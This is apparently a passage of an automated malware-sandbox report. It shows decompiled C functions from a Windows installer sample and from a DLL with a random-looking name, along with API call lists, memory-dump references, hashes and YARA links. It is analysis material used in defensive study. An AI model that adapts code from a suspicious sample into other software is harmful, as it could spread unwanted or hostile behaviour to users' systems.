                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                              • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                                                                              • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                              • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D1AD0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 162COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _NdrComplexArrayBufferSize@12.RGSBZEOG(?,?,?), ref: 6F1D1B9D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ArrayBufferComplexSize@12
                                                                                              • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x$invalid format type %x
                                                                                              • API String ID: 3462415225-3633984987
                                                                                              • Opcode ID: e812cb45086aec6419ceff232df965012f985e6f59eb3da8c2f978f21565681d
                                                                                              • Instruction ID: c1a29a0dedb1a29bedfcc52cb89c2bb2d49e81f8dc362695a0e4e3e0361a12c3
                                                                                              • Opcode Fuzzy Hash: e812cb45086aec6419ceff232df965012f985e6f59eb3da8c2f978f21565681d
                                                                                              • Instruction Fuzzy Hash: B771D9B8600209AFCB04CF58C594EAABBB5FF88394F15C158FD498B355D731EA91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 86%
                                                                                              			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040548B(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E004055E3(_t52);
				_t27 = E00405602(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42eb74; // 0x34000
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403098(_t47);
						E00403066(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                              0x0040266e
                                                                                              0x00402670
                                                                                              0x0040267c
                                                                                              0x0040267f
                                                                                              0x00402689
                                                                                              0x0040268d
                                                                                              0x0040268d
                                                                                              0x00402693
                                                                                              0x004026a0
                                                                                              0x004026a8
                                                                                              0x004026ab
                                                                                              0x004026b1
                                                                                              0x004026bf
                                                                                              0x004026c4
                                                                                              0x004026c8
                                                                                              0x004026cb
                                                                                              0x004026d4
                                                                                              0x004026e0
                                                                                              0x004026e4
                                                                                              0x004026e7
                                                                                              0x004026f1
                                                                                              0x00402710
                                                                                              0x004026f8
                                                                                              0x004026fd
                                                                                              0x00402705
                                                                                              0x00402708
                                                                                              0x0040270d
                                                                                              0x0040270d
                                                                                              0x00402717
                                                                                              0x00402717
                                                                                              0x00402729
                                                                                              0x00402730
                                                                                              0x00402742
                                                                                              0x00402742
                                                                                              0x00402748
                                                                                              0x00402748
                                                                                              0x00402753
                                                                                              0x00402754
                                                                                              0x00402758
                                                                                              0x0040275c
                                                                                              0x00402762
                                                                                              0x00402762
                                                                                              0x00402769
                                                                                              0x00402156
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00034000,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                                                                              • GlobalFree.KERNEL32 ref: 00402717
                                                                                              • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                                                                              • GlobalFree.KERNEL32 ref: 00402730
                                                                                              • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3294113728-0
                                                                                              • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                                                              • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                                                                                              • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                                                              • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404CC9, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404CC9(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e344; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec14; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
					}
					_t26 = lstrlenA(0x4297b0);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4297b0;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x4297b0)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x4297b0, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                              0x00404ccf
                                                                                              0x00404cdb
                                                                                              0x00404cde
                                                                                              0x00404ce4
                                                                                              0x00404cf0
                                                                                              0x00404cf3
                                                                                              0x00404cf6
                                                                                              0x00404cfc
                                                                                              0x00404cfc
                                                                                              0x00404d02
                                                                                              0x00404d0a
                                                                                              0x00404d0d
                                                                                              0x00404d2a
                                                                                              0x00404d2e
                                                                                              0x00404d37
                                                                                              0x00404d37
                                                                                              0x00404d41
                                                                                              0x00404d4a
                                                                                              0x00404d56
                                                                                              0x00404d5d
                                                                                              0x00404d61
                                                                                              0x00404d64
                                                                                              0x00404d77
                                                                                              0x00404d85
                                                                                              0x00404d85
                                                                                              0x00404d89
                                                                                              0x00404d8b
                                                                                              0x00404d8e
                                                                                              0x00000000
                                                                                              0x00404d8e
                                                                                              0x00404d0f
                                                                                              0x00404d17
                                                                                              0x00404d1f
                                                                                              0x00404d25
                                                                                              0x00000000
                                                                                              0x00404d25
                                                                                              0x00404d1f
                                                                                              0x00404d0d
                                                                                              0x00404d98

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                              • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                              • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B694,7519EA30), ref: 00404D25
                                                                                              • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                              • SendMessageA.USER32 ref: 00404D5D
                                                                                              • SendMessageA.USER32 ref: 00404D77
                                                                                              • SendMessageA.USER32 ref: 00404D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2531174081-0
                                                                                              • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                                                              • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                                                                                              • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                                                              • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404598, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00404598(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                              0x004045a6
                                                                                              0x004045b3
                                                                                              0x004045b9
                                                                                              0x004045f7
                                                                                              0x004045f7
                                                                                              0x00404606
                                                                                              0x0040460d
                                                                                              0x00000000
                                                                                              0x0040460f
                                                                                              0x004045bb
                                                                                              0x004045ca
                                                                                              0x004045d2
                                                                                              0x004045d5
                                                                                              0x004045e7
                                                                                              0x004045ed
                                                                                              0x004045f4
                                                                                              0x00000000
                                                                                              0x004045f4
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                              • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                                                                                              • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                              • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402B2D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414b78; // 0xd0131
					_t11 =  *0x428b88; // 0xd0135
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                              0x00402b3a
                                                                                              0x00402b48
                                                                                              0x00402b4e
                                                                                              0x00402b4e
                                                                                              0x00402b5c
                                                                                              0x00402b5e
                                                                                              0x00402b64
                                                                                              0x00402b6b
                                                                                              0x00402b6d
                                                                                              0x00402b6d
                                                                                              0x00402b83
                                                                                              0x00402b93
                                                                                              0x00402ba5
                                                                                              0x00402ba5
                                                                                              0x00402bad

                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                                                                                              • MulDiv.KERNEL32(000D0131,00000064,000D0135), ref: 00402B73
                                                                                              • wsprintfA.USER32 ref: 00402B83
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402B93
                                                                                              • SetDlgItemTextA.USER32 ref: 00402BA5
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402B7D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                                                              • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                                                                                              • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                                                              • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D1440, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 224COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 21%
                                                                                              			E6F1D1440(void* _a4, signed int* _a8, signed short* _a12) {
				signed char* _v8;
				signed char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t147;
				signed short* _t162;
				intOrPtr _t225;
				void* _t262;
				void* _t263;
				void* _t264;
				void* _t265;

				_v8 = 0;
				_v12 = 0;
				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
				_v28 = 0;
				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				0x6f1d0000("(%p,%p,%p)\n", _a4, _a8, _a12);
				_t263 = _t262 + 0x10;
				_t225 = _a4;
				_t267 =  *((intOrPtr*)(_t225 + 0x34));
				if( *((intOrPtr*)(_t225 + 0x34)) == 0) {
					_v32 =  *((intOrPtr*)(_a4 + 0x30));
					_v36 =  *((intOrPtr*)(_a4 + 0x14));
					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6F1D5070(_t267, _a4, _a8, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v32;
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14));
					0x6f1d0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) -  *((intOrPtr*)(_a4 + 4)));
					_t263 = _t263 + 8;
					_v28 = 1;
					 *((intOrPtr*)(_a4 + 0x14)) = _v36;
				}
				E6F1D7400(_a4 + 4, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t264 = _t263 + 8;
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v12 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
				if(_v8 != 0) {
					_t162 = _a12;
					0x6f1d0000(_a4, _t162);
					_v40 = _t162;
					E6F1DD120( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
					_t264 = _t264 + 0x18;
					_v16 =  *((intOrPtr*)(_a4 + 0x3c));
					_v20 =  *((intOrPtr*)(_a4 + 0x44));
					_v24 =  *((intOrPtr*)(_a4 + 0x40));
				}
				_t147 = E6F1D8F30(_a4, _a8, _a12, _v12);
				_t265 = _t264 + 0x10;
				_a8 = _t147;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v16;
					 *((intOrPtr*)(_a4 + 0x44)) = _v20;
					 *((intOrPtr*)(_a4 + 0x40)) = _v24;
					E6F1DD360( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
					_t265 = _t265 + 0x14;
				}
				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
				if(_v28 != 0) {
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
					 *((intOrPtr*)(_a4 + 0x34)) = 0;
				}
				do {
					0x6f1d0000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
					_t265 = _t265 + 0xc;
					if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
						0x6f1d0000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
						_t265 = _t265 + 8;
					}
				} while (0 != 0);
				return 0;
			}




















                                                                                              0x6f1d1446
                                                                                              0x6f1d144d
                                                                                              0x6f1d145a
                                                                                              0x6f1d145d
                                                                                              0x6f1d1464
                                                                                              0x6f1d146b
                                                                                              0x6f1d1472
                                                                                              0x6f1d148a
                                                                                              0x6f1d148f
                                                                                              0x6f1d1492
                                                                                              0x6f1d1495
                                                                                              0x6f1d1499
                                                                                              0x6f1d14a5
                                                                                              0x6f1d14ae
                                                                                              0x6f1d14c2
                                                                                              0x6f1d14c8
                                                                                              0x6f1d14db
                                                                                              0x6f1d14e6
                                                                                              0x6f1d14fa
                                                                                              0x6f1d150f
                                                                                              0x6f1d1514
                                                                                              0x6f1d1517
                                                                                              0x6f1d1524
                                                                                              0x6f1d1524
                                                                                              0x6f1d1541
                                                                                              0x6f1d1546
                                                                                              0x6f1d154f
                                                                                              0x6f1d155a
                                                                                              0x6f1d1565
                                                                                              0x6f1d1565
                                                                                              0x6f1d156e
                                                                                              0x6f1d1579
                                                                                              0x6f1d1584
                                                                                              0x6f1d1584
                                                                                              0x6f1d158d
                                                                                              0x6f1d1596
                                                                                              0x6f1d159d
                                                                                              0x6f1d159f
                                                                                              0x6f1d15a7
                                                                                              0x6f1d15af
                                                                                              0x6f1d15d1
                                                                                              0x6f1d15d6
                                                                                              0x6f1d15df
                                                                                              0x6f1d15e8
                                                                                              0x6f1d15f1
                                                                                              0x6f1d15f1
                                                                                              0x6f1d1604
                                                                                              0x6f1d1609
                                                                                              0x6f1d160c
                                                                                              0x6f1d1613
                                                                                              0x6f1d161b
                                                                                              0x6f1d1624
                                                                                              0x6f1d162d
                                                                                              0x6f1d164e
                                                                                              0x6f1d1653
                                                                                              0x6f1d1653
                                                                                              0x6f1d165c
                                                                                              0x6f1d1663
                                                                                              0x6f1d166e
                                                                                              0x6f1d1674
                                                                                              0x6f1d1674
                                                                                              0x6f1d167b
                                                                                              0x6f1d1696
                                                                                              0x6f1d169b
                                                                                              0x6f1d16b2
                                                                                              0x6f1d16d0
                                                                                              0x6f1d16d5
                                                                                              0x6f1d16d5
                                                                                              0x6f1d16d8
                                                                                              0x6f1d16e1

                                                                                              APIs
                                                                                              • _NdrComplexStructBufferSize@12.RGSBZEOG(00000000,00000000,00000000), ref: 6F1D14DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: BufferComplexSize@12Struct
                                                                                              • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x
                                                                                              • API String ID: 1319815426-1841717460
                                                                                              • Opcode ID: b5d737de0f4f03bff0e0e1560ce75073511ada061054ec597d08d6d680120dd4
                                                                                              • Instruction ID: 1a86f5574880af7e995a3762d3a819bed6891e45de6e808e0e61acb9ac7c9e9e
                                                                                              • Opcode Fuzzy Hash: b5d737de0f4f03bff0e0e1560ce75073511ada061054ec597d08d6d680120dd4
                                                                                              • Instruction Fuzzy Hash: E5A1D6B8A00209AFDB08CF58C590AAEBBB5FF88354F148159FD199B355D731EA91CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D47D0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 175COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 25%
                                                                                              			E6F1D47D0(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v48;
				void* _t183;
				void* _t186;
				void* _t187;
				void* _t188;

				_v12 =  *(_a12 + (1 << 0)) & 0x000000ff;
				_v20 =  *(_a12 + (1 << 1)) & 0x0000ffff;
				_v16 =  *(_a12 + (1 << 2)) & 0x0000ffff;
				_v8 = 0;
				0x6f1d0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				0x6f1d0000("index=%d\n", _v20);
				_t131 = _a4;
				E6F1DE8C0(_a4, 2, _a12,  &_v48);
				_t186 = _t183 + 0x2c;
				if((_v12 & 0x000000c0) == 0) {
					E6F1D73D0(_a4 + 4, _a4 + 4, (_v12 & 0x0000000f) + 1);
					_t187 = _t186 + 8;
				} else {
					E6F1D73D0(_t131, _a4 + 4, 4);
					_t188 = _t186 + 8;
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + 4;
					_t153 = _a4;
					if( *((intOrPtr*)(_a4 + 0x34)) != 0) {
						_v8 =  *((intOrPtr*)(_a4 + 4));
						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
						_t153 = _a4;
						 *((intOrPtr*)(_a4 + 0x34)) = 0;
					}
					E6F1D73D0(_t153, _a4 + 4, 8);
					_t187 = _t188 + 8;
				}
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					 *_a8 =  *0x6f1d0000(_a4, _v16);
					E6F1E0730( *_a8, 0, _v16);
					_t187 = _t187 + 0xc;
				}
				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x38)) + (_v20 << 4) + 8))))( &_v48,  *((intOrPtr*)(_a4 + 4)),  *_a8);
				if(_v8 != 0) {
					do {
						0x6f1d0000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
